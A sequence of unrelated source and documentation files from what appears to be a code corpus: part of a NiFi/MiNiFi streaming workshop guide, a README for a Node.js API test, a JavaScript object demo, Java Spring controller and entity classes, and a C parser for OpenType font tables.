Before storing data in ES, let's separate between Insert and Update events. This is not required since the PutElasticSearchRecord processor supports both insert and update operations. But for other processors, this may be required. Also, some CDC tools generate different schemas for insert and update operations so routing data is required in some cases.
For routing the data, add a RouteOnAttribute processor and configure it to separate between inserts and updates like the following. Connect the UpdateAttribute to this RouteOnAttribute processor.

Storing data in ElasticSearch event by event is not efficient and will create huge load on the indexing service. To achieve better performance, we need to batch these events in groups. Add two MergeRecord processors (one for Inserts and one for Updates) and configure them as follows. **Note:** you can use copy paste to create the second MergeRecord processors.

This configuration means that the flow files will be merged by groups of 5 events: flow files will be queued up until we have at least 5 events in the queue, then grouped into one flow file and passed to the next processor. The value 5 is for demo only, you would set a higher value in real life (1000 events for instance). To avoid waiting too long if data rate is not high, we can set the "Max Bin Age" property. Here, we are telling NiFi to merge data after 10 seconds even if we don't reached the minimum of 5 flow files. You can also set a maximum number of record to merge if you want to avoid having big batches. Min/Max settings can be set on the number of flow files or the size of data.
Connect the RouteOnAttribute to these MergeRecord processors and use the appropriate relation. Auto-terminate the "Unmatched" relation of the RouteOnAttribute processor.

Add two PutElasticSearchHttpRecord and configure them as follows. Use the Index operation for the Insert CDC events and Update operation for Update CDC events. Note how easy it is to use Record-based processors now since we have already prepared our Schema and Reader/Writer. The Elastic processor configuration should be:
- ElasticSearch URL : ${elastic.url}
- Record Reader : JsonTreeReader
- Identifier Record Path : /id
- Index : ${tableName}
- Type : default
- Index Operation : index (for the first processor), update (for the second one)

Add a LogAttribute processor after the PutElasticSearchHttpRecord processors: this will be used for debugging only. Connect the different processors (RouteOnAttribute -> MergeRecord -> PutElasticSearch -> LogAttribute) as show in the following screenshoot. Be careful to the name of the relations. For instance, connect the Merge processors to the Elastic processors using the merged relation, and auto-terminate the other relations. Start all the processor except the LogAttribute Processor. Notice that data is queued before the merge processors for 10 seconds. Notice also the number of input and output flow files at the Merge processor.

Now, open ElasticSearch UI and check that your customer data has been indexed: http://YOUR-CLUSTER-IP:9200/customers/_search?pretty
## Publish update events in Kafka
The last step for this lab is to publish "update" cdc events in Kafka. These events will be used by the stream processing applictaion to check if there's a risk of fraud. Add a PublishKafkaRecord_1_0 and configure it to use the Avro record writer as follow.

Now, connect the Publish Kafka processor to the Log Attribute processor and start it. To check that data is published in Kafka, use the Kafka consumer utility with this command:
```
/usr/hdf/current/kafka-broker/bin/kafka-console-consumer.sh --bootstrap-server YOUR-INTERNAL-SERVER-ADDRESS:6667 --topic customers --from-beginning
```
# Lab 5 Version flow in NiFi Registry
Now that we have our first use case implemented, let's explore the NiFi Flow Registry service. To save our flow:
- Navigate to the root NiFi canvas
- Right click on the PG SRC1_CDCIngestion
- Click on "versions" and "Start version control"
- In the popup window, you can see that the Registry and the Bucket are already populated because we have only one Registry and one bucket available. Notice also the version which is set to "1"
- Add a flow name, a flow description and a version commit, then click on save.

Notice now the new green check mark on the process group. This tells us that the process group has the last version of flows in the registry.

Now, go to NiFi registry and check that your flow has been successfuly saved.

Now let's explore the behavior of the registry when we edit our flow.
- Go inside the process group and make several changes (processor position, processor name, processor settings). As you can see, the PG icone turned to a gray star that shows that there are local changes not yet pushed to the registry.
- Right click on the processor, select "version" menu then "show local changes" to see what are these changes
- Right click on the processor, select "version" menu then "commit local changes" to save the new version
- Go to the NiFi registry and check that the new version has been successfully saved

Now let's try to import our flow. Unfortunately, we don't have another cluster to deploy it so let's deploy it in the same instance.
- Click on the PG icon in the top toolbar, drag it and release.
- Click on Import instead of clicking on add
- Select your flow, and then select the version you would like to import
- Click on import and your PG and its dependencies will be added to NiFi

To finish this lab, change the value of a variable in the original PG, commit the updates, and then pull the new version in the second PG. This should not impact your local variables.
# Lab 6
The objective of this lab is to ingest web applications logs with MiNiFi. Each web application generates logs on customer behaviour on the website. An event is a JSON line that describes a user behaviour on a product web page and gives information on:
- Id: the user browsing the website. id = 0 means that the user is not connected or not known.
- Product: the product id that the customer has looked at.
- Sessionduration: how long the customer stayed on the product web page. A short duration means that the user is not interested by the product and is only browsing.
- Buy: a boolean that indicates if the user bought the product or not
- Price: the total amount of money that the customer spent
We will simulate the web apps by writing directly events to the files inside the tmp folder. The final objective will be to add browsing information to customer data in Elasticsearch. This will be the first step for the customer 360 view.
## Design MiNiFi pipeline
Before working on the MiNiFi pipeline, we need to prepare an Input port to receive data from the agent. In the NiFi root Canvas, add an Input port and call it **SRC2_InputFromWebApps**.
Now, inside the NiFi Agent1_logsIngestion process group, create the MiNiFi flow as follows:

As you can see, it's a very simple pipeline that tails all web-appXXX.log files inside /tmp and send them to our NiFi via S2S. You can enrich this pipeline with more steps such as compression or filtering on session duration later if you like. The tail fail configuration is described below:

Save the flow as a template and download the associated XML file.
## Deploy MiNiFi agent
MiNiFi is part of the NiFi ecosystem but should be deployed separately. Currently, the deployment should be automated by the user. In the near future, we will build a Command & Control tool (C2) that can be used to deploy, monitor and manage a number of MiNiFi agents from a central location. Run the following instructions to install MiNiFi in /usr/hdf/current/minifi
```
sudo mkdir /usr/hdf/current/minifi
sudo mkdir /usr/hdf/current/minifi/toolkit
wget http://apache.claz.org/nifi/minifi/0.5.0/minifi-0.5.0-bin.tar.gz
tar -xvf minifi-0.5.0-bin.tar.gz
sudo cp -R minifi-0.5.0/. /usr/hdf/current/minifi
```
In addition to NiFi, we will need the MiNiFi toolkit to convert our XML template file into YAML file understandable by MiNiFi.
```
wget http://apache.claz.org/nifi/minifi/0.5.0/minifi-toolkit-0.5.0-bin.tar.gz
tar -xvf minifi-toolkit-0.5.0-bin.tar.gz
sudo cp -R minifi-toolkit-0.5.0/. /usr/hdf/current/minifi/toolkit
```
## Deploy MiNiFi pipeline
SCP the template you downloaded from your NiFi node to your HDF cluster. You can Curl mine and change it to add your NiFi URL in the S2S section.
```
sudo curl -sSL -o /usr/hdf/current/minifi/conf/minifi.xml https://raw.githubusercontent.com/ahadjidj/Streaming-Workshop-with-HDF/master/scripts/minifi.xml
```
Use the toolkit to convert your XML file to YAML format:
```
sudo /usr/hdf/current/minifi/toolkit/bin/config.sh transform /usr/hdf/current/minifi/conf/minifi.xml /usr/hdf/current/minifi/conf/config.yml
```
Now start the MiNiFi agent and look to the logs:
```
sudo /usr/hdf/current/minifi/bin/minifi.sh start
tail -f /usr/hdf/current/minifi/logs/minifi-app.log
```
## Design NiFi pipeline
Inside the SRC2_LogIngestion PG, create the NiFi pipeline that will process data coming from our agent. The general flow is:
- Receive data through S2S
- Filter events based on the sessionduration. We consider that a customer who spends less than 20 seconds on a product page is not interested. We will filter these events and ignore them.
- Filter unknown users browsing events (id=0). These events can be browsing activity from a non-logged-in customer or a customer who is not yet logged in. We can store these events in HDFS for other use cases such as product recommendations. In a real life scenario, a browsing session will have an ID and can be used to link browsing history to a user once logged in.
- For the other events, we will do two things:
- Update customer data in Elasticsearch to include the products that the customer has looked at. For the sake of simplicity, we will store only the last item. If you want to keep a complete list, you can use ElasticSearch API with scripts feature (eg. "source": "ctx.source.products.add(params.product)")
- Convert logs event to Avro and publish them to Kafka. These events will be used by SAM in the fraud detection use case. The final flow looks like the below:

Start by adding an Input port followed by an update attribute that adds an attribute schema.name with the value ${source.schema}.
To route events based on the different business rules, we will use an interesting Record processor that leverage Calcite to do SQL on flow files. Add a query record processor and configure it as shown below:

As you can see, this processor will create two relations (unknown and validsessions) and route data according to the SQL query. Note that a subset of fields can be selected also (ex. SELECT id, sessionduration from FLOWFILE).
Route data coming from the unknown relation to HDFS.
Route data coming from validsessions to Kafka. In the PublishKafkaRecord, use the AvroRecordSetWriter as Record Writer to publish data in Avro format. Remember that we set **Schema Write Strategy** of the Avro Writer to **HWX Content-Encoded Schema Reference**. This means that each Kafka message will have the schema reference encoded in the first byte of the message (required by SAM).

Now let's update our Elasticsearch index to add data on customer browsing behaviors. To learn how to do schema conversion with record based processors, let's consider that we want to add the browsed product ID and sessionduration as opposed to the information on whether the customer bought the product or not. To implement this, we need a ConvertRecord processor.

As you can see, I had to create a new JsonSetWritter to specify the write Schema which is different from the read schema referenced by the attribute **schema.name**. The **Views JsonRecordSetWriter** should be configured as below. Note that the Schema Name field is set to logs_view that we have already defined in our schema registry. We can avoid fixing the schema directly in the record writer by creating global Read/Write controller and use two attributes : schema.name.input and schema.name.output.

Add a PutElasticSearchHTTPRecord and configure it to update your customer data.
Now let's test the end-to-end flow by creating a file in /tmp with some logs events.
```
cat <<EOF >> /tmp/web-app.log
{"id":2,"product":"12321","sessionduration":60,"buy":"false"}
{"id":0,"product":"24234","sessionduration":120,"buy":"false"}
{"id":10,"product":"233","sessionduration":5,"buy":"true","price":2000}
{"id":1,"product":"98547","sessionduration":30,"buy":"true","price":1000}
EOF
```
You should see data coming from the MiNiFi agent to NiFi through S2S. Data will be filtered, routed and stored in Kafka and Elasticsearch. Check data in ElasticSearch and confirm that browsing information has been added to customer 1 and 2. Check also that you have one event that go through the unknown connection.
|
Markdown
|
UTF-8
| 2,293 | 3.546875 | 4 |
[] |
no_license
|
# Test the Registeration and Recovery API
### This test contains tests for the /register and /recover API endpoints of [customerpay.me](staging.api.customerpay.me)
To run the tests, you will need to have Nodejs installed on your chosen platform.
The test application uses the built-in 'https' Nodejs module to make API calls to the endpoints.
The test defines a module called 'regandrec.js' that defines two functions 'register()' and 'recoverPwd()' which respectively tests the /register and /recover endpoints.
To run the test, you need to clone this repository, create a JavaScript file in the cloned repository and write a JavaScript code that imports the test functions e.g;
var myTest = require('./regandrec');
## Registration test
For the registration test, you will call the 'register()' function which takes the user's phone number, password, country and state respectively as strings e.g
myTest.register('2349888888888', 'p@$$w0rd' , 'Nigeria' , 'Imo');
If the user does not already exist, the function returns and logs the string "User registration successful".
If the user already exists, it returns and logs the string "User already exists".
Otherwise it returns and logs the string "An unknown error occurred"
>*Note that the function returns the string "Incorrect arguments" if the function is called without the complete arguments or string type*
## Recovery test
For the recovery test, you will call the 'recoverPwd()' function which takes the user's phone number, as string e.g
myTest.register('2349888888888');
If the user already exist, the function returns and logs the string "Recovery email sent successfully".
If the user does not exist, it returns and logs the string "User not found".
Otherwise it returns and logs the string "An unknown error occurred"
>*Note that the function returns the string "Incorrect arguments" if the function is called without the complete arguments or string type*
You can run the test by passing the named of your test file to the 'node' command e.g
> $ node test.js
An example test code *exampletest.js* has been attached to illustrate the calls. Run
> $ node exampletest.js
Simply comment out one of the functions to test another and change the parameters as pleased.
|
JavaScript
|
UTF-8
| 337 | 4.1875 | 4 |
[
"MIT"
] |
permissive
|
//Object
//Criando um Objecto
const person = {
name: 'John', //nome
age: 30, //idade
weight:88.6, //peso
isAdmin: true
}
//Para pegar uma propriedade desse objeto e imprimir na tela
console.log(person)
console.log(person.name)
console.log(person.age)
console.log(`${person.name} tem ${person.age} anos`)
|
Java
|
UTF-8
| 2,143 | 2.4375 | 2 |
[] |
no_license
|
package magazineIndex.controller;
import java.util.ArrayList;
import java.util.List;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.ui.Model;
import magazineIndex.repository.PublicationRepository;
import magazineIndex.repository.IssueRepository;
import magazineIndex.viewClasses.SeedsView;
@Controller
public class MagazineController {
private final PublicationRepository pRepo;
private final IssueRepository iRepo;
private static final Logger log = LoggerFactory.getLogger(MagazineController.class);
@Autowired
public MagazineController(PublicationRepository pRepo, IssueRepository iRepo) {
this.pRepo = pRepo;
this.iRepo = iRepo;
}
// index page
@RequestMapping(value = "/index")
public String index(Model model) {
List<SeedsView> bob = new ArrayList<SeedsView>();
bob.add(new SeedsView("1", "2", "3"));
model.addAttribute("seedstarter", bob);
return "index";
}
@RequestMapping(value = "")
public String index() {
return "index";
}
@RequestMapping(value="seeds")
public String seeds() {
return "seeds";
}
// // not working attempt to have a default page.
// @RequestMapping(value = "*")
// public String getFallback(@RequestParam("name") String name, HttpServletRequest request) {
// String path = request.getServletPath();
// log.error("unknown path: " + path);
// return "index";
// }
/*
// show blank add form
@GetMapping("/issue/new")
public String showNewIssueForm(Issue issue) {
return "issue/add";
}
// process result of filled in add form
@PostMapping("/issue/add")
public String newIssue(@Valid Issue issue, BindingResult result, Model model) {
if (result.hasErrors()) {
return "issue/add";
}
iRepo.save(issue);
model.addAttribute("issues", iRepo.findAll());
return "issue/list";
}
*/
}
|
Java
|
UTF-8
| 1,762 | 2.640625 | 3 |
[] |
no_license
|
package com.kindleparser.parser.entities;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.Table;
@Entity
@Table(name = "Book")
public class Book {
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
private Long bookId;
private String bookTitle;
private Long authorId1;
private Long authorId2;
private Long authorId3;
public Book(String bookTitle) {
this.bookTitle = bookTitle;
}
public Book(String bookTitle, Long authorId1) {
this.bookTitle = bookTitle;
this.authorId1 = authorId1;
}
public Book(String bookTitle, Long authorId1, Long authorId2) {
this.bookTitle = bookTitle;
this.authorId1 = authorId1;
this.authorId2 = authorId2;
}
public Book(String bookTitle, Long authorId1, Long authorId2, Long authorId3 ) {
this.bookTitle = bookTitle;
this.authorId1 = authorId1;
this.authorId2 = authorId2;
this.authorId3 = authorId3;
}
@Column(name = "bookId", nullable = false)
public Long getBookId() {
return bookId;
}
public void setBookId(Long bookId) {
this.bookId = bookId;
}
public String getBookTitle() {
return bookTitle;
}
public void setBookTitle(String bookTitle) {
this.bookTitle = bookTitle;
}
public Long getAuthorId1() {
return authorId1;
}
public void setAuthorId1(Long authorId1) {
this.authorId1 = authorId1;
}
public Long getAuthorId2() {
return authorId2;
}
public void setAuthorId2(Long authorId2) {
this.authorId2 = authorId2;
}
public Long getAuthorId3() {
return authorId3;
}
public void setAuthorId3(Long authorId3) {
this.authorId3 = authorId3;
}
}
|
C
|
UTF-8
| 18,384 | 3.296875 | 3 |
[] |
no_license
|
/***************************
* フォントファイル処理
**************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include "fontfile.h"
//=============================
// 基本処理
//=============================
/* オフセットテーブルを読み込み */
static void _read_offset_table(Font *p)
{
TableItem *ti;
int num;
//バージョン
font_read32(p);
//テーブル数
num = font_read16(p);
//skip
font_seek_cur(p, 2 * 3);
//データ確保
ti = (TableItem *)malloc(sizeof(TableItem) * (num + 1));
if(!ti) return;
p->table = ti;
//TableRecord
for(; num > 0; num--, ti++)
{
//識別子
ti->name = font_read32(p);
//チェックサム
font_seek_cur(p, 4);
//オフセット位置
ti->offset = font_read32(p);
//長さ
font_seek_cur(p, 4);
}
//データ終了
ti->name = ti->offset = 0;
}
/* フォント閉じる*/
void font_close(Font *p)
{
if(p)
{
if(p->gind_table)
free(p->gind_table);
if(p->table)
free(p->table);
if(p->fp_output)
fclose(p->fp_output);
fclose(p->fp);
}
}
/* フォントファイルを開く
*
* フォントコレクションの場合は、1番目のフォント。
*
* return: NULL で失敗 */
Font *font_open_file(char *filename)
{
Font *p;
FILE *fp;
uint32_t ver;
//ファイル開く
fp = fopen(filename, "rb");
if(!fp)
{
printf("can't open '%s'\n", filename);
return NULL;
}
//Font 確保
p = (Font *)calloc(1, sizeof(Font));
if(!p)
{
fclose(fp);
return NULL;
}
p->fp = fp;
//オフセットテーブルへ
ver = font_read32(p);
if(ver == 0x74746366)
{
//[フォントコレクション]
//バージョン・フォント数をスキップ
font_seek_cur(p, 8);
//1番目のフォントのオフセット位置へ
font_seek(p, font_read32(p));
}
else
//ファイル位置クリア
rewind(p->fp);
//オフセットテーブル読み込み
_read_offset_table(p);
return p;
}
/* 出力用のテキストファイルを開く */
int font_open_output_file(Font *p,char *filename)
{
p->fp_output = fopen(filename, "wt");
if(!p->fp_output)
{
printf("! can't open '%s'\n", filename);
return 1;
}
return 0;
}
/* 指定テーブルの位置へ
*
* return: 0 で成功、1 で見つからなかった */
int font_goto_table(Font *p,uint32_t name)
{
TableItem *ti;
for(ti = p->table; ti->name; ti++)
{
if(ti->name == name)
{
p->cur_table_offset = ti->offset;
font_seek(p, ti->offset);
return 0;
}
}
return 1;
}
/* GSUB テーブルへ移動し、先頭データ読み込み
*
* offset_dat に各テーブルのオフセット位置が入る。
*
* return: 0 で成功、1 で失敗 */
int font_goto_GSUB(Font *p)
{
uint16_t majver,minver;
if(font_goto_table(p, FONT_MAKE_TAG('G','S','U','B')))
{
printf("not found 'GSUB'\n");
return 1;
}
majver = font_read16(p);
minver = font_read16(p);
p->offset_dat[0] = font_read16(p);
p->offset_dat[1] = font_read16(p);
p->offset_dat[2] = font_read16(p);
printf("---- GSUB ----\n\n");
printf("version: %d.%d\n", majver, minver);
printf("scriptListOffset: %d\n", p->offset_dat[0]);
printf("featureListOffset: %d\n", p->offset_dat[1]);
printf("lookupListOffset: %d\n\n", p->offset_dat[2]);
return 0;
}
/* GPOS テーブルへ移動し、先頭データ読み込み
*
* offset_dat に各テーブルのオフセット位置が入る。
*
* return: 0 で成功、1 で失敗 */
int font_goto_GPOS(Font *p)
{
uint16_t majver,minver;
if(font_goto_table(p, FONT_MAKE_TAG('G','P','O','S')))
{
printf("not found 'GPOS'\n");
return 1;
}
majver = font_read16(p);
minver = font_read16(p);
p->offset_dat[0] = font_read16(p);
p->offset_dat[1] = font_read16(p);
p->offset_dat[2] = font_read16(p);
printf("---- GPOS ----\n\n");
printf("version: %d.%d\n", majver, minver);
printf("scriptListOffset: %d\n", p->offset_dat[0]);
printf("featureListOffset: %d\n", p->offset_dat[1]);
printf("lookupListOffset: %d\n\n", p->offset_dat[2]);
return 0;
}
/* head テーブルを読み込み
*
* units_per_em, loca_format */
void font_read_table_head(Font *p)
{
if(font_goto_table(p, FONT_MAKE_TAG('h','e','a','d')))
return;
font_seek_cur(p, 18);
p->units_per_em = font_read16(p);
font_seek_cur(p, 30);
p->loca_format = (int16_t)font_read16(p);
}
/* maxp テーブルを読み込み
*
* glyph_nums */
void font_read_table_maxp(Font *p)
{
if(font_goto_table(p, FONT_MAKE_TAG('m','a','x','p')))
return;
//version
font_seek_cur(p, 4);
//glyphNums
p->glyph_nums = font_read16(p);
}
//=============================
// cmap
//=============================
/* format 4 : Unicode BMP */
static void _read_cmap_format4(Font *p)
{
uint8_t *dat,*pend,*pstart,*pdelta,*poffset;
uint16_t end,start,rangeoffset;
int16_t delta;
uint32_t *ptable;
int i,c,gind,len,segcnt;
//format
if(font_read16(p) != 4) return;
//len
len = font_read16(p);
//language
font_seek_cur(p, 2);
//segCountX2
segcnt = font_read16(p) / 2;
//skip
font_seek_cur(p, 2 * 3);
//endCode 以降のデータを読み込み
len -= 2 * 7;
dat = (uint8_t *)malloc(len);
if(!dat) return;
fread(dat, 1, len, p->fp);
pend = dat;
pstart = dat + segcnt * 2 + 2;
pdelta = pstart + segcnt * 2;
poffset = pdelta + segcnt * 2;
ptable = p->gind_table;
//
for(i = 0; i < segcnt; i++)
{
//endCode
end = readbuf16(pend);
//startCode
start = readbuf16(pstart);
//idDelta
delta = (int16_t)readbuf16(pdelta);
//idRangeOffset
rangeoffset = readbuf16(poffset);
//Unicode:start - end までのグリフインデックスを算出し、セット
for(c = start; c <= end; c++)
{
if(rangeoffset == 0)
gind = (c + delta) & 0xffff;
else
gind = readbuf16(poffset + rangeoffset + (c - start) * 2);
if(gind)
ptable[gind] = c;
}
//次のセグメントへ
pend += 2;
pstart += 2;
pdelta += 2;
poffset += 2;
}
free(dat);
}
/* format 12 : Unicode full */
static void _read_cmap_format12(Font *p)
{
uint32_t num,start,end,gid,c,*ptable;
//format
if(font_read16(p) != 12) return;
//skip
font_seek_cur(p, 2 + 4 + 4);
//グループ数
num = font_read32(p);
ptable = p->gind_table;
for(; num > 0; num--)
{
start = font_read32(p);
end = font_read32(p);
gid = font_read32(p);
for(c = start; c <= end; c++)
ptable[c - start + gid] = c;
}
}
/* グリフインデックス->Unicode 変換テーブルの生成 */
void font_make_gindex_table(Font *p)
{
uint32_t *pd,offset;
uint16_t ver,num,platform,encoding,flags = 0;
//cmap テーブルへ
if(font_goto_table(p, FONT_MAKE_TAG('c','m','a','p')))
return;
//確保
pd = (uint32_t *)calloc(1, 4 * 65536);
if(!pd) return;
p->gind_table = pd;
//cmap テーブル読み込み
ver = font_read16(p);
num = font_read16(p);
if(ver != 0) return;
for(; num > 0; num--)
{
platform = font_read16(p);
encoding = font_read16(p);
offset = font_read32(p);
//Unicode BMP
if(!(flags & 1)
&& ((platform == 0 && encoding == 3)
|| (platform == 3 && encoding == 1)))
{
font_save_pos(p);
font_seek_from_table(p, offset);
_read_cmap_format4(p);
font_load_pos(p);
flags |= 1;
}
//Unicode full
if(!(flags & 2)
&& ((platform == 0 && encoding == 4)
|| (platform == 3 && encoding == 10)))
{
font_save_pos(p);
font_seek_from_table(p, offset);
_read_cmap_format12(p);
font_load_pos(p);
flags |= 2;
}
}
}
/* cmap を使って、Unicode -> グリフID
*
* return: 見つからなかったら 0 */
int font_cmap_get_glyph_id(Font *p,uint32_t code)
{
uint16_t num1,plat,enc,end,st,range;
int16_t delta;
uint32_t offset;
int i,segcnt,seek_segcnt;
//cmap テーブルへ
if(font_goto_table(p, FONT_MAKE_TAG('c','m','a','p')))
return 0;
//version
if(font_read16(p) != 0) return 0;
//Unicode BMP を見つける
num1 = font_read16(p);
for(; num1 > 0; num1--)
{
plat = font_read16(p);
enc = font_read16(p);
offset = font_read32(p);
if((plat == 0 && enc == 3) || (plat == 3 && enc == 1))
{
font_seek_from_table(p, offset);
break;
}
}
if(num1 == 0) return 0;
//format
if(font_read16(p) != 4) return 0;
font_seek_cur(p, 4);
segcnt = font_read16(p) / 2;
font_seek_cur(p, 6);
//endCode
for(i = 0; i < segcnt; i++)
{
end = font_read16(p);
if(end == 0xffff) return 0;
if(code <= end) break;
}
if(i == segcnt) return 0;
seek_segcnt = (segcnt - 1) * 2;
//startCode
font_seek_cur(p, seek_segcnt + 2);
st = font_read16(p);
if(code < st) return 0;
//idDelta
font_seek_cur(p, seek_segcnt);
delta = (int16_t)font_read16(p);
//idRangeOffset
font_seek_cur(p, seek_segcnt);
range = font_read16(p);
//
if(range == 0)
//delta
return (code + delta) & 0xffff;
else
{
font_seek_cur(p, -2 + range + (code - st) * 2);
return font_read16(p);
}
}
//=============================
// テキストに出力
//=============================
/* Coverage テーブルをリスト化して出力
* (対象となるグリフのリスト) */
void font_output_coverage_list(Font *p)
{
FILE *fp = p->fp_output;
uint16_t format,num,first,end;
format = font_read16(p);
num = font_read16(p);
fprintf(fp, "<format:%d, count:%d>\n", format, num);
if(format == 1)
{
for(; num > 0; num--)
{
font_output_gid_to_uni(p, font_read16(p));
fputc('\n', fp);
}
}
else if(format == 2)
{
for(; num > 0; num--)
{
first = font_read16(p);
end = font_read16(p);
fprintf(fp, "<startCoverageIndex: %d>\n", font_read16(p));
for(; first <= end; first++)
{
font_output_gid_to_uni(p, first);
fputc('\n', fp);
}
}
}
}
/* タグを文字列としてテキスト出力 */
void font_output_tag(Font *p,uint32_t t)
{
fprintf(p->fp_output, "'%c%c%c%c'",
t >> 24, (t >> 16) & 255, (t >> 8) & 255, t & 255);
}
/* UTF-16BE の文字列を読み込んで、テキストに出力 */
void font_output_utf16be_str(Font *p,int len)
{
uint32_t c,c2;
for(; len > 0; len -= 2)
{
//UTF-16BE -> UTF-32
c = font_read16(p);
if(c >= 0x10000)
{
c2 = font_read16(p);
c = (((c & 0x03ff) << 16) | (c2 & 0x03ff)) + 0x10000;
}
//UTF-8
put_uni_to_utf8(p->fp_output, c);
}
fputc('\n', p->fp_output);
}
/* テーブルを使って、GID -> Unicode し、テキスト出力 */
void font_output_gid_to_uni(Font *p,uint16_t gid)
{
FILE *fp = p->fp_output;
uint32_t c;
c = p->gind_table[gid];
fprintf(fp, "[%d] ", gid);
if(c == 0)
//対応する Unicode がない
fputs("(none)", fp);
else
{
fputc('(', fp);
put_uni_to_utf8(fp, c);
fprintf(fp, ") U+%04X", c);
}
}
/* GID -> Unicode し、テキスト出力 (GID は出力しない) */
void font_output_gid_to_uni_char(Font *p,uint16_t gid)
{
FILE *fp = p->fp_output;
uint32_t c;
c = p->gind_table[gid];
if(c == 0)
fprintf(fp, "(none)");
else
{
put_uni_to_utf8(fp, c);
fprintf(fp, " (U+%04X)", c);
}
}
/* GID の置き換えを、テキスト出力 */
void font_output_gid_rep(Font *p,uint16_t gid_src,uint16_t gid_dst)
{
font_output_gid_to_uni(p, gid_src);
fputs(" => ", p->fp_output);
font_output_gid_to_uni(p, gid_dst);
fputs("\n", p->fp_output);
}
/* ClassDef テーブルのデータを出力 */
void font_output_classDef(Font *p)
{
FILE *fp = p->fp_output;
uint16_t format,gid,end,cnt,class;
int i;
format = font_read16(p);
if(format == 1)
{
//gid 〜 gid + cnt - 1 の範囲
gid = font_read16(p);
cnt = font_read16(p);
for(; cnt > 0; cnt--)
{
class = font_read16(p);
font_output_gid_to_uni(p, gid++);
fprintf(fp, " <class %d>\n", class);
}
}
else if(format == 2)
{
//指定グリフ ID 範囲
cnt = font_read16(p);
for(; cnt > 0; cnt--)
{
gid = font_read16(p);
end = font_read16(p);
class = font_read16(p);
for(i = gid; i <= end; i++)
{
font_output_gid_to_uni(p, i);
fprintf(fp, " <class %d>\n", class);
}
}
}
}
/* ValueRecord の値を出力
*
* flags : ValueRecord の値フラグ
* last_enter : 最後に改行を出力 */
void font_output_ValueRecord(Font *p,uint16_t flags,int last_enter)
{
FILE *fp = p->fp_output;
if(flags == 0) return;
fprintf(fp, "[");
if(flags & 1)
font_fprintf(p, fp, "xPlacement:$h, ");
if(flags & 2)
font_fprintf(p, fp, "yPlacement:$h, ");
if(flags & 4)
font_fprintf(p, fp, "xAdvance:$h, ");
if(flags & 8)
font_fprintf(p, fp, "yAdvance:$h, ");
if(flags & 16)
font_fprintf(p, fp, "xPlaDeviceOffset:$H, ");
if(flags & 32)
font_fprintf(p, fp, "yPlaDeviceOffset:$H, ");
if(flags & 64)
font_fprintf(p, fp, "xAdvDeviceOffset:$H, ");
if(flags & 128)
font_fprintf(p, fp, "xAdvDeviceOffset:$H, ");
if(last_enter)
fputs("]\n", fp);
else
fputc(']', fp);
}
//=============================
//
//=============================
/* 現在位置からシーク */
void font_seek_cur(Font *p,int n)
{
fseek(p->fp, n, SEEK_CUR);
}
/* ファイル先頭から指定位置へシーク */
void font_seek(Font *p,uint32_t pos)
{
fseek(p->fp, pos, SEEK_SET);
}
/* 現在のテーブル位置からのオフセット位置へシーク */
void font_seek_from_table(Font *p,uint32_t pos)
{
fseek(p->fp, p->cur_table_offset + pos, SEEK_SET);
}
/* 現在のファイル位置を記録 */
void font_save_pos(Font *p)
{
if(p->filepos_cur < FONT_FILEPOS_NUM)
{
fgetpos(p->fp, p->filepos + p->filepos_cur);
p->filepos_cur++;
}
}
/* 記録した一つ前のファイル位置に戻る */
void font_load_pos(Font *p)
{
if(p->filepos_cur > 0)
{
p->filepos_cur--;
fsetpos(p->fp, p->filepos + p->filepos_cur);
}
}
/* 1byte 読み込み */
uint8_t font_read8(Font *p)
{
uint8_t b;
fread(&b, 1, 1, p->fp);
return b;
}
/* 2byte 読み込み */
uint16_t font_read16(Font *p)
{
uint8_t b[2];
fread(b, 1, 2, p->fp);
return (b[0] << 8) | b[1];
}
/* 4byte 読み込み */
uint32_t font_read32(Font *p)
{
uint8_t b[4];
fread(b, 1, 4, p->fp);
return ((uint32_t)b[0] << 24) | (b[1] << 16) | (b[2] << 8) | b[3];
}
/* 8byte 読み込み */
int64_t font_read64(Font *p)
{
int64_t ret = 0;
uint8_t b[8];
int i;
fread(b, 1, 8, p->fp);
for(i = 0; i < 8; i++)
ret |= (int64_t)b[i] << ((7 - i) << 3);
return ret;
}
//========================
/* fprintf 実体 */
#define _FORM_F_SET 1
#define _FORM_F_X 2
#define _FORM_F_BITS 4
static void _font_fprintf(Font *p,FILE *fp,const char *format,va_list ap)
{
char c;
uint8_t flags;
uint16_t u16,*pu16;
int16_t i16,*pi16;
uint32_t u32,*pu32;
while(1)
{
c = *(format++);
if(c == 0) break;
if(c != '$')
fputc(c, fp);
else
{
c = *(format++);
if(c == 0) break;
//オプション
flags = 0;
while(1)
{
if(c == 'x')
flags |= _FORM_F_X;
else if(c == '+')
flags |= _FORM_F_SET;
else if(c == 'b')
flags |= _FORM_F_BITS;
else
break;
c = *(format++);
if(c == 0) return;
}
//
switch(c)
{
//uint16
case 'H':
u16 = font_read16(p);
if(flags & _FORM_F_BITS)
put_bits(u16, 16);
else if(flags & _FORM_F_X)
fprintf(fp, "0x%04X", u16);
else
fprintf(fp, "%d", u16);
if(flags & _FORM_F_SET)
{
pu16 = va_arg(ap, uint16_t *);
*pu16 = u16;
}
break;
//int16
case 'h':
i16 = (int16_t)font_read16(p);
fprintf(fp, "%d", i16);
if(flags & _FORM_F_SET)
{
pi16 = va_arg(ap, int16_t *);
*pi16 = i16;
}
break;
//uint32
case 'I':
u32 = font_read32(p);
if(flags & _FORM_F_X)
fprintf(fp, "0x%08X", u32);
else
fprintf(fp, "%u", u32);
if(flags & _FORM_F_SET)
{
pu32 = va_arg(ap, uint32_t *);
*pu32 = u32;
}
break;
//tag
case 't':
u32 = font_read32(p);
font_put_tag_str(u32);
if(flags & _FORM_F_SET)
{
pu32 = va_arg(ap, uint32_t *);
*pu32 = u32;
}
break;
}
}
}
}
/* printf */
void font_printf(Font *p,const char *format,...)
{
va_list ap;
va_start(ap, format);
_font_fprintf(p, stdout, format, ap);
va_end(ap);
}
/* fprintf
*
* $[options][type]
*
* <type>
* h : int16
* H : uint16
* I : uint32
* t : tag
*
* <option>
* + : 引数のポインタに読み込んだ値を代入
* x : 16進数で表示
* b : 2進数で表示 */
